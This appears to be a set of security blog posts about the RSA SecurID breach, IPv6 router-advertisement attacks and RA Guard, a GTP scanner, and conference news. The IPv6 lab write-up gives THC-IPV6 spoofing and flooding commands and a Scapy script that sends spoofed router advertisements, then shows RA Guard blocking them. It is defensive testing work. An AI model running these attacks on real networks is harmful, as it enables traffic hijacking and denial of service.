Lots has been written about this blog post from RSA describing the (potential) details of the attack, so I will refrain from detailed comments on a piece that Marsh Ray aptly called “some of the most egregious hyperbole I’ve read in infosec”.
Just one short note. Presumably the attack, in an early stage, used a “spreadsheet [that] contained a zero-day exploit that installs a backdoor through an Adobe Flash vulnerability (CVE-2011-0609)”.
TROOPERS11 was a blast! We received great feedback from all attendees and speakers. This really pushes us towards our next goals and an even better security conference in 2012.
We’re happy that everybody got home safely with new ideas and inspirations in mind. On a side note: the awesome TROOPERS badge caused trouble for some of you with airport security 😉 I really hope everybody found a way to take it back home. It will hopefully find its way to an adequate place right next to your old memorabilia (the cup from your first won soccer match, your college degree or photos from your first ballet show). Regard it as proof of your latest achievement and tell everybody loud and proud: WE ARE TROOPERS.
Best regards,
Florian
PS: Videos and photos are coming soon. Stay tuned.
Some of you may have heard of the break-in at RSA and may now be wondering “what does this mean to us?” and “what can be done?”. Not being an expert on RSA SecurID at all – I’ve been involved in some projects, however not on the technical implementation side but on the architecture or overall [risk] management side – I’ll still try to contribute to the debate 😉
Feel free to correct me either by comment or by personal email in case the following contains factual errors.
Fundamentals
My understanding of the way RSA SecurID tokens work is roughly this:
a) The authentication capabilities provided by the system (as part of an overall infrastructure where authentication plays a role) are based on two factors: a one-time password (OTP) generated at regular intervals by both a token and some (backend) authentication server, and a PIN known by the user.
b) The OTP generation process takes some initialization value called the “seed” and the current time as input and calculates – by means of some algorithm at whose core probably sits a hash function – the OTP itself.
c) The algorithm seems publicly known (there are some cryptanalytic papers listed in the Wikipedia article on RSA SecurID, and a generator – needing the seed as input – has been available for some time now). Even if it wasn’t public we should assume that Kerckhoffs’s principle exists for a reason 😉
d) So, at the end of the day, the OTP of a given token at a given point in time can be calculated once the seed of this specific token is known.
This means: to some (large) degree, the whole security of the OTP relies on the secrecy of the seed, which, obviously, must be maintained. [For the overall authentication process there’s still the PIN, but this one can be assumed to be the “weaker part” of the whole thing.]
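To illustrate the principle (and only the principle – this is explicitly not RSA’s proprietary SecurID algorithm, just a generic TOTP-style construction along the lines of RFC 6238), a minimal Python sketch of “OTP = f(seed, time)” might look like this:

# Illustrative sketch only: a generic time-based OTP, not the SecurID algorithm.
# The point: anyone holding the seed can compute the same value at the same time.
import hmac, hashlib, struct, time

def generic_time_based_otp(seed, step=60, digits=6):
    counter = int(time.time()) // step                  # current time window
    digest = hmac.new(seed, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                          # dynamic truncation
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)

print(generic_time_based_otp(b"example-seed-0123456789"))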
Flavors
RSA SecurID tokens, and those of other vendors as well, are sold in two main variants:
– as hardware devices (in different sizes, colors etc.). Here the seed is encoded into the token as part of the manufacturing process, so there must be some import process of token serial numbers and their associated seeds into the authentication server (located at the organization using the product for authentication), and some subsequent mapping of a user + PIN to a certain token (identified by serial number, I assume). The seeds are thus generated on the product vendor’s (e.g. RSA’s) side at an early stage of the manufacturing process and distributed as part of the product delivery. I’m not sure why a vendor (like RSA) should keep those associations of (token) serial numbers and their seeds once the product delivery process is completed (as I said, I’m not an expert in this area so I might overlook sth here, even sth fairly obvious ;-)), but I assume this nevertheless happens to some extent. And I assume this is part of the potential impact of the current incident, see below.
– as so-called “soft tokens”, i.e. software instances running on a PC or mobile device and generating the OTP. For this purpose the seed is needed again, and to the best of my knowledge there are, in the RSA space at least, two ways the seed can get onto the device:
– generate it as part of the “user creation” process on the authentication server and subsequently distribute it to users (by email or download link) for import. For obvious reasons not everybody likes this, security-wise.
– generate it in parallel on the token and the server, by means of an RSA-developed scheme called Cryptographic Token Key Initialization Protocol (CT-KIP), and thereby avoid transmitting the seed over the network.
Btw: In both cases importing the seed into a TPM would be nice, but – as of mid 2010 when I did some research – this was still in a quite immature state. So not sure if this currently is a viable option.
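As for the CT-KIP variant: I haven’t looked at the exact message formats (RFC 4758 has the details), but the general idea – both sides contribute randomness and each derives the seed locally, so the seed itself never crosses the wire – can be sketched roughly as follows. Purely illustrative; the derivation function and all names are hypothetical stand-ins, not the real CT-KIP construction:

# Conceptual sketch of the CT-KIP idea, NOT the RFC 4758 construction.
import hmac, hashlib, os

def derive_seed(client_nonce, server_nonce, server_public_key_bytes):
    # hypothetical stand-in for the actual key derivation
    return hmac.new(client_nonce,
                    b"key generation" + server_public_key_bytes + server_nonce,
                    hashlib.sha256).digest()

client_nonce = os.urandom(16)   # generated on the token/device, sent to the server in protected form
server_nonce = os.urandom(16)   # generated on the authentication server, sent to the device
server_public_key_bytes = b"<server public key, placeholder>"

seed_on_token  = derive_seed(client_nonce, server_nonce, server_public_key_bytes)
seed_on_server = derive_seed(client_nonce, server_nonce, server_public_key_bytes)
assert seed_on_token == seed_on_server   # same seed on both ends, never transmitted itself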
Attacks
For an attacker going after the seed I see three main vectors:
– compromise of an organization’s authentication server. From audits in the past I know these systems often reside in network segments that are not too easily accessible, and they are – sometimes – reasonably well protected (hardening etc.). Furthermore I have no idea how easy it would be to extract the seeds from such a system once compromised. Getting them might allow for subsequent attacks on remote users (logging into VPN gateways, OWA servers etc.), but only against this specific organization. And if the attacker has already managed to compromise the organization’s authentication server, this effort might not even be necessary anymore.
– compromise of the (mobile) devices of some users of a given organization using soft tokens, and copying/stealing their seeds. This could potentially be done by a piece of malware (provided it manages to access the seed at all, which might be difficult – protected storage and stuff comes to mind – or not; I just don’t know ;-)).
This is the vector that infosec people opposing the replacement of hard tokens by soft tokens (e.g. for usability reasons) usually warn about. There are people who do not regard this as a very relevant risk, as it requires initial compromise of the device in question. Which, of course, can happen. But why “spend energy” on getting the seed then, as the box is compromised anyway (along with any data processed on it)? I’m well aware of the “attacker can use the seed for future attacks from other endpoints” argument. One might just wonder about the incentive for an attacker to go after the seeds…
It should be noted that binding the (soft) token to a specific device – identified by serial number, unique device identifier (like in the case of iPhones), hard disk ID or sth, which has been possible in the RSA SecurID space for some time, I believe since Authentication Manager 7.1 – might to some degree serve as a mitigating control against this type of attack.
– attack the vendor (RSA) and hope to get access to the seeds of many organizations, which can then be used in subsequent targeted attacks. I have the vague impression that this is exactly what happened here. Art Coviello writes in his letter:
“[the information gained by the attackers] could potentially be used to reduce the effectiveness of a current two-factor authentication implementation as part of a broader attack.”
I interpret this as follows: “dear customers, face the fact that some attackers might have your seeds – and the OTPs calculated from them – at their disposal, so you’re left with the PIN as the last resort for the security of the overall authentication process”.
I leave the conclusions to the valued reader (and, evidently, the assessment of whether my interpretation holds or not) and proceed with the next section.
Mitigating Controls & Steps
First, let’s have a quick look at the recommendations RSA gives (in this document). There we find stuff like “We recommend customers follow the rule of least privilege when assigning roles and responsibilities to security administrators.” – yes, thanks, RSA, for reminding us, this is always a good idea 😉 – and equally conventional wisdom, including pieces like “We recommend customers update their security products and the operating systems hosting them with the latest patches”. And, of course, it’s pure coincidence that they mention the use of SIEM systems twice… being a SIEM vendor themselves ;-))
For my part, I’d like to add:
– in case you use RSA SecurID soft tokens, binding individual tokens to specific devices seems a good idea to me (yes, this might mean that users with several devices end up with several different token instances; and, yes, I understand that in the shiny new age of user-owned funky smartphone gadgets used for corporate information processing, this might be a heavy burden to ask of your users ;-)).
– some of you might re-think your position on hard vs. soft tokens: in the RSA SecurID space soft tokens can be “seeded” by means of CT-KIP, so no third party is involved or ever holds the seeds. I’m not aware of such a feature for hard tokens.
– whatever you do, think about the supply chain of security components, which parties are involved and which knowledge they might accumulate.
– replacing proprietary stuff by standards-based approaches (like X.509 certificates) should always be considered.
– whatever you do, authentication-wise, you should always have a plan for revocation and credential replacement. This should be one of the overall lessons learned from this incident and the current trend that well-organized attackers will go after authentication providers and infrastructures (see, for example, this presentation from the recent NSA Information Assurance Symposium).
Last but not least I’d like to draw your attention to this upcoming presentation on the current state of authentication at Troopers. I’d be surprised if Steve and Marsh would not include the RSA incident in their talk 😉
Reading this advisory I’m quite tempted to emit another rant on the relationship between heavy use of 3rd party components, lack of (security) quality assurance, and services running at times when they’re not needed (see the second workaround here). I’ll refrain from that for today. I just wanted to let you know that the underlying vulnerability in Struts2 was initially discovered by Meder Kydyraliev, who gives this talk at Troopers in two weeks. He’ll certainly describe the inner workings of this one, and others… 😉
Just a short addition to the previous posts ([1], [2]) on IPv6 security today. In the last two days I had the opportunity to sharpen my understanding of some aspects of IPv6 behavior in (Windows) LANs. Actually I gave an IPv6 workshop for some members of the “Project Services” team of the Hamburg-based IT solutions provider computer & competence [btw: thanks to Mr. Wendler of CuC for organizing it, and thanks to Mr. Cassel for the breakfast…].
Those guys were amazingly adept with Wireshark (I got a – long-needed – refresher on display filters ;-)) and networking technologies in general, so it was a workshop in the purest sense: lots of practical hands-on, lots of tinkering, lots of enlightening discussions.
I pretty much like every part of my work (I mean, from my humble perspective infosec is the most exciting discipline anyway, isn’t it ;-)) but workshops like this one are sth I particularly enjoy. Huge personal progress and getting paid for it 😉
Ok, enough enthusiasm… let’s get back to earth. Based on the stuff we did I’d like to raise two points.
a) I found out that the latest MS Windows versions all seem to provide a parameter allowing one to disable the processing of router advertisements altogether. Being an old-fashioned networking guy I’m not sure if I like this (given it seems a violation of core IPv6 architecture fundamentals); still – wearing the hat of a network security practitioner – I recognize there are certainly use cases where this comes in handy, e.g. DMZ segments with a mostly (and deliberately so) static configuration approach.
The parameter can be set on an interface level by
netsh int ipv6 set int [index] routerdiscovery=disabled
Checking the actual state can be done with the corresponding show command (from memory – the exact syntax and output naming may vary a bit between Windows versions):
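netsh int ipv6 show int [index]

The “Router Discovery” line in the resulting parameter list should then reflect the setting.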
When set, the box (interface) in question will no longer process router advertisements, which might provide some protection against RA-based attacks (notably the spoofed RA attack described in this post). The configuration of the basic IP parameters must then either be done manually or by means of DHCPv6. It should be noted that DHCPv6 currently does not provide an option to distribute a default route/gateway (this IETF draft on Default Router and Prefix Advertisement Options for DHCPv6 was seemingly discontinued, see also the extensive discussion in RFC 6104), so in case of a DHCPv6-based (stateful) configuration approach the respective systems won’t have a default route (which, again, might be helpful for their security in certain scenarios).
Obviously, once you use this for hardening purposes, you should closely keep track of the affected systems. Otherwise troubleshooting might become a nightmare…
b) I had a closer look at the router advertisements generated by fake_router6 from the THC-IPV6 attack suite. Those are generated with a “High” (value: 01) router preference. So going with a high router preference on one’s own might just provide equal terms. Of course we still recommend using this approach (discussed in this post, and in RFC 6104) to protect from “misled entities emitting router advertisements on the local link”.
This post is the sequel to this one on the IPv6 security feature called “RA guard”. As announced in that post, I recently got a 4948 on eBay. After installing the appropriate image and noticing that RA guard was still unavailable, I found out it should have been a 4948E, which is capable of “doing IPv6 in hardware” (as opposed to the “simple 4948” only supporting IPv6 in a “software switched” way; pls note there’s also the informal term 4948-E, denoting a 4948 running an “enhanced image”).
Well… we’ll certainly find some useful function for that device – and I just initiated the acquisition of a 4948E – but I was just eager to get my hands on the practical use and implications of RA guard. Looking at the Cisco Feature Navigator for “IPv6 Basic RA Guard” it seems that it’s still the same platforms supporting it as eight weeks ago, so there was only one option left: get one of our Cat 65Ks from the basement and perform the testing with it.
Given ERNW’s strong emphasis on sports, pretty much immediately some kind of “strong man contest” evolved along the lines of “who can lift and carry the device without further assistance”, so we had quite some fun just putting the box into operation.
[for those interested we can provide the number and nature of modules installed at the time of that contest ;-)]
Ok, back to the technical side of things. Here’s what we did:
Step 1) Perform RA based attacks with “RA Guard” being absent.
For that purpose we used Van Hauser’s THC-IPV6 attack suite (which can be found here) and performed two specific attacks.
1a) Use
fake_router6 eth0 2001:db8:dead:beef::/64
to send spoofed RAs which resulted in an additional prefix and associated default gateway being learned on the victim system (default install of current MS Windows).
It should be noted that the additional (“spoofed”) default gateway had a better (= lower) metric in the routing table.
1b) Use
flood_router6 eth0
to send arbitrary spoofed router advertisements (with the eventual purpose of a DoS condition). This worked equally well. Right after starting the attack the CPU load of the attacked system ‒ and for that matter, the load of other systems on the local link as well ‒ went to 100% (and stayed there for hours after stopping the emanation of packets on the attacker’s host).
[you might notice that this is not the “oldest and weakest laptop we took from our lab shelf”…]
In short: both RA based attacks we tried worked like a charm.
So this is absolutely something everyone responsible for the security of an IPv6-enabled network should be concerned about…
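For those curious what such a spoofed RA (as sent by fake_router6 in step 1a) roughly looks like on the wire, here’s a minimal Scapy sketch – assuming a Scapy version with the IPv6 layers available; fake_router6 obviously does a lot more than this:

# Illustrative sketch only - not fake_router6 itself.
# Sends a single spoofed Router Advertisement announcing the bogus
# prefix 2001:db8:dead:beef::/64 to all nodes on the local link.
from scapy.all import Ether, IPv6, ICMPv6ND_RA, ICMPv6NDOptPrefixInfo, ICMPv6NDOptSrcLLAddr, sendp

ra = (Ether() /
      IPv6(dst="ff02::1") /                                               # all-nodes multicast
      ICMPv6ND_RA(routerlifetime=1800) /
      ICMPv6NDOptPrefixInfo(prefix="2001:db8:dead:beef::", prefixlen=64, L=1, A=1) /
      ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55"))                   # made-up MAC, for illustration

sendp(ra, iface="eth0")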
Step 2) Put the lab device into action, enable RA guard and check if it helps.
[which, btw, “silently ignores” any WS-X6248-RJ-45 modules present in the box. Of course, I’m aware that all of you valued readers always carefully read the release notes of this (or other) images before deploying them…]
We then enabled RA guard on the access-ports to-be by
Router(config)#int range f1/24 - 36
Router(config-if-range)#switchport
Router(config-if-range)#switchport mode access
Router(config-if-range)#ipv6 nd raguard
and performed the attacks again.
Without success! Seemingly the box efficiently (and silently) discarded all RA packets arriving on those ports.
So we can certainly state that RA guard fully performs as expected. One minor annoyance we noticed: there seems to be no log message of any kind while the attack is in progress.
However, earlier – when performing step 1a – we had noticed sth like this on the router legitimately serving the local network with RAs:
Thus there might still be a way to detect RA based attacks. It’s just not on the box providing protection from them but on another one.
If you want to see these attacks (and the – quite simple – configuration of RA guard) in practice you can do so either at our workshop on “IPv6 security in LANs” at Troopers or at the Heise IPv6 Kongress in May. At both occasions we’ll demonstrate this stuff.
We think that RA guard is pretty much the only way to protect against RA based attacks in an operationally feasible way (as opposed to, say, filtering ICMP type 134 by means of port based or VLAN ACLs).
To mitigate the risk of “RA interference” caused by potentially misconfigured systems (e.g. Windows systems running 6to4 with a public IPv4 address and Internet Connection Sharing enabled; more on this in a future post on IPv6 tunnel technologies) or by systems “accidentally inserted into the local network” (an employee connecting a SOHO DSL router – which, again, certainly never happens in your network…), there might be another configuration tweak that could help. The standards track RFC 4191 on Default Router Preferences and More-Specific Routes introduced the concept of a preference assigned to router advertisements distributed by routers on the local link.
For that purpose the format of RA messages is extended and two of the previously unused bits within the byte containing the flags are used for a “Prf” (Default Router Preference) value.
The configuration is quite simple (on Cisco routers where the feature was introduced in IOS Version 12.4(2)T) and goes like this:
Router(config)# interface f0/1
Router(config-if)# ipv6 nd router-preference {high | medium | low}
Hosts receiving RAs tagged with a high preference will prefer them over RA messages carrying the default value (“medium”). We’ll play around with this in a more detailed fashion at some occasion and keep you posted. In the interim you might look here to get some background on the way router preference works.
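If you want to quickly check which preference the RAs in your network actually carry, a small sketch like the following might help (again assuming Scapy with the IPv6 layers; if memory serves, Scapy exposes the preference bits as the “prf” field):

# Illustrative sketch: sniff one RA on eth0 and print its router preference.
# Per RFC 4191 the 2-bit encoding is 01 = High, 00 = Medium, 11 = Low.
from scapy.all import sniff, ICMPv6ND_RA

pkts = sniff(iface="eth0", lfilter=lambda p: ICMPv6ND_RA in p, count=1, timeout=60)
if pkts:
    print("Router preference (prf):", pkts[0][ICMPv6ND_RA].prf)
else:
    print("No RA seen within 60 seconds")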
The next post of our series is planned to cover the (in the current Windows world) ever-present tunnel technologies and their security implications.
gtp_scan is a small Python script that scans for GTP (GPRS Tunneling Protocol) speaking hosts. To discover those hosts it uses GTP’s built-in ping mechanism: it sends a GTP packet of the type ECHO_REQUEST and listens for an incoming GTP ECHO_REPLY. It’s capable of generating ECHO_REQUESTs for GTP version 1 and GTP version 2. The script can also scan for both GTP-C and GTP-U (the control channel and the user data channel); only the port differs here.
In the output the received packet is displayed and the basic GTP header is dissected so one can see a GTP version 1 host answering a GTP version 2 ECHO_REQUEST with the ‘version not supported’ message.
Tests have shown that there are some strange services around which answer a GTP ECHO_REQUEST with a lot of weird data, which leads to “kind of” false positive results – but these can easily be spotted by checking the output data with your brain 😉 (e.g. there is no GTP version 12).
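For those who want to get a feeling for what happens on the wire, here is a minimal illustrative sketch (this is not gtp_scan’s actual code) of a GTPv1 echo towards the GTP-C port; the target address is just a documentation placeholder:

# Illustrative sketch only - not gtp_scan itself.
# Sends a minimal GTPv1 Echo Request (message type 0x01) to UDP/2123 (GTP-C)
# and waits briefly for an answer (0x02 = Echo Response, 0x03 = version not supported).
import socket

def gtpv1_echo(target, port=2123, timeout=2.0):
    # flags 0x32 (version 1, PT=1, sequence number present), type 0x01,
    # length 0x0004, TEID 0, sequence number 1, N-PDU 0, next extension header 0
    echo_req = bytes.fromhex("320100040000000000010000")
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.settimeout(timeout)
    try:
        s.sendto(echo_req, (target, port))
        data, _ = s.recvfrom(1024)
        return data
    except socket.timeout:
        return None
    finally:
        s.close()

print(gtpv1_echo("192.0.2.1"))   # any reply at all suggests a GTP speaker; byte 1 holds the message type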
Just a short, somewhat non-technical post today: I really like this response Ross Anderson gave to the “UK Cards Association”, which had asked Cambridge University to take a thesis of one of their students offline. The letter pretty much summarizes how security research should be treated and backed by those interested in a more secure world.
On a personal note I’d like to add that Ross’ main volume “Security Engineering: A Guide to Building Dependable Distributed Systems”, initially published in 2001 and updated with a second edition in 2008, has been the most influential security book for me on my long journey in the infosec space (which started back in 1997, with some workshops on firewalls I gave for IT auditors). If I could take only one infosec book to a lonely island, it would be this one.
[not sure which one to take if I could only take one book at all 😉 … maybe Thomas Mann’s “Doktor Faustus”… will get back to this once I’ve figured out an answer ;-)]
Back in a few days with the next part on IPv6, have a good one everybody
At first, a happy new year to our loyal readers (and, of course, to everybody else too ;-))! We hope you all had some pleasant transition times, not suffering from bad hangovers after 27C3 or sth 😉
Things are heating up for Troopers and in the course of that we started putting together the slides for the workshops (I’m delighted that Flo told me today there’s already quite a number of bookings for the workshops…). I myself will give the “IPv6 Security in LANs” workshop, together with Christopher. The workshop preparation will be accompanied by a series of blogposts with three main areas to be covered:
– IPv6 behavior in the LAN, its underlying trust model and subsequent attacks (all the attacks centered around ND, RA etc.).
– tunnel technologies and their inherent risks.
– risks associated with IPv6 addressing (reachability of internal systems due to route leakage, problems related with privacy extensions etc.).
Pls note that we assume the reader already has some knowledge of IPv6’s inner workings, so we’re not going to cover protocol basics here.
[at some point we might provide a list of books we regard valuable for the topic though]
To get some inspiration and an update on current attacks I just watched the YouTube video of Marc Heuse’s (aka Van Hauser from THC) talk at 27C3 on “Recent advances in IPv6 insecurities”. Impressive stuff! I’d say: a must-see for everybody involved in IPv6 security.
The Q+A session will serve as the starting point for today’s post.
The second question (at about 44:55 in the youtube video) comes from a guy asking for “mitigation techniques”. Marc’s answer is “vendor updates”.
While this is certainly correct to some degree I’d like to add that there are – depending on the network infrastructure deployed – fairly simple ways to mitigate all the nasty “spoofed RA”, “RA flooding” etc. stuff.
To illustrate those let’s take ERNW’s “Seven Sisters of Network Security” approach which describes fundamental guidelines for infrastructure security that can be applied regardless of the technology/-ies in question (or even regardless of the network context. They work for any kind of complex system, be it a network, a building, a production plant etc.).
a) Sister no. 1: “Access Control” (keep the threat out of the overall system). Obviously, keeping an attacker who tries to perform all those awful IPv6-based things out of your network altogether (e.g. by using 802.1X) would be elegant and nice. Still, let’s assume for the moment that the approach of access control is, for whatever reason, not available.
b) Sister no. 2: “Isolation” (limit the assets’ visibility/reachability with regard to the threat).
The isolation principle can be applied in two ways. First, it should be obvious that, given the link-local nature of RAs, most RA/ND related attacks can only be performed on the local link (“IP subnet” in IPv4 lingo), so putting systems-to-be-protected in different segments than those where attacks can be expected (e.g. due to the type of users or systems located in them) would be a first step. So, once more, proper network segmentation can be your friend. This can’t be stated often enough! Unfortunately this isolation approach isn’t present in many environments and can’t be implemented easily either.
Second – and this (finally ;-)) is the main point of this post – on an abstract level router advertisements are kind-of sensitive traffic that should not originate from “the untrusted access domain” but only from “trusted infrastructure devices”. So preventing “the access domain” from injecting RAs and limiting RA originators to some trusted entities (e.g. identified by the network ports they’re connected to) would be “the architectural approach”. Which is exactly what the “Router Advertisement [RA] Guard” feature does.
RA Guard, currently described (note that I’m not writing “specified”) in this IETF draft (after all available as a “08 version”, which means there’s some momentum in the process), works quite similarly to other Layer 2 protection mechanisms (for example “DHCP snooping”) available on many access switches nowadays: “do not accept a certain type of [infrastructure protocol] packets on certain ports”. In our context this would mean “do not accept RAs on all ports except those where the trusted L3 devices are connected”. Usually this type of protection mechanism requires (only!) one extra line of config added to your “secured port configuration templates” – which all of you use, don’t you? 😉 – and in the case of Cisco devices this line would be “ipv6 nd raguard” (see this doc for more details).
Unfortunately, in the Cisco space (haven’t checked other vendors so far) RA guard seems currently only available on recent images for either Cat65K with Sup 720/Sup-32 and 4500/4900 series devices. We have a Cat65 with Sup-32 in our lab but I certainly don’t want to use this for the workshop (hint: being in the same room as a running Cat65 and trying to understand what the instructor tells you might instantly become tedious, for you… or the instructor ;-)).
So, for today, I can only state that based on my “paper understanding” of the way RA guard works, this will certainly be a good (meaning: operationally feasible) way of addressing a number of problems related to IPv6’s trust model in LANs. I just bought a 4948 on eBay and will start playing around with the feature once it arrives, and share my thoughts on it here. I’m sure that RA guard will creep into other images soon as well, so I’d be surprised if it weren’t present on, say, 3750s in the near future.
c) For completeness’ sake it should be noted that going with sister no. 3 “Restriction” (restrict/filter traffic between threat and asset) would be another option.
Filtering ICMPv6 type 134 (router advertisement) messages by port-based or VLAN ACLs _could_ be another potential mitigation approach – albeit one with much higher operational cost than going with RA guard. So, if available, pls use RA guard and not the filtering approach. And pls don’t use both (at least not on the same devices). Why? See this post…
d) Again, for completeness’ sake I’d like to add that sister no. 4 “Use of Cryptography” could come into play as well, by using SEND (SEcure Neighbor Discovery as of RFC 3971). Personally I do not expect many environments to use SEND at all due to the large crypto and subsequent operational overhead.
Remember: the initial architecture of IPv6 was developed in the 90s where the naive thinking of “LANs are trusted and crypto can solve all problems if there are any” was still prevalent and (practically) nobody considered operational effort as a main driver (or “inhibitor”).
Will keep you updated once the 4948 “shows up” and I can perform some practical testing.
The British Standards Institution recently published “Cloud Computing. A Practical Introduction to the Legal Issues”. I ordered an electronic copy yesterday (I did that here, for GBP 30) and after a first glance can say there’s lots of valuable information in it.
Merry Christmas to everybody, have some peaceful and relaxing days